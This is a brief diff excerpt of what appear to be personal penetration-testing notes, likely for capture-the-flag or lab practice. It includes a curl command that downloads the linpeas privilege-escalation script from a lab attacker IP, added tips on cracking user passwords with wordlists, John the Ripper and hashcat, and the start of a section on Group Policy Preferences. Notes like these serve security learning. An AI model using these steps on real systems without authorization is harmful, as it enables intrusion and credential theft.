byteshell/Notes/Tips.md

 curl -O http://10.10.14.24/linpeas.sh
 ```

+# About finding passwords for users

+- Use every wordlist and johntheripper/hashcat and try to find password

 # About Group Policy Preferences

 Group Policy Preferences (GPP) was introduced in Windows Server 2008, and among many other features,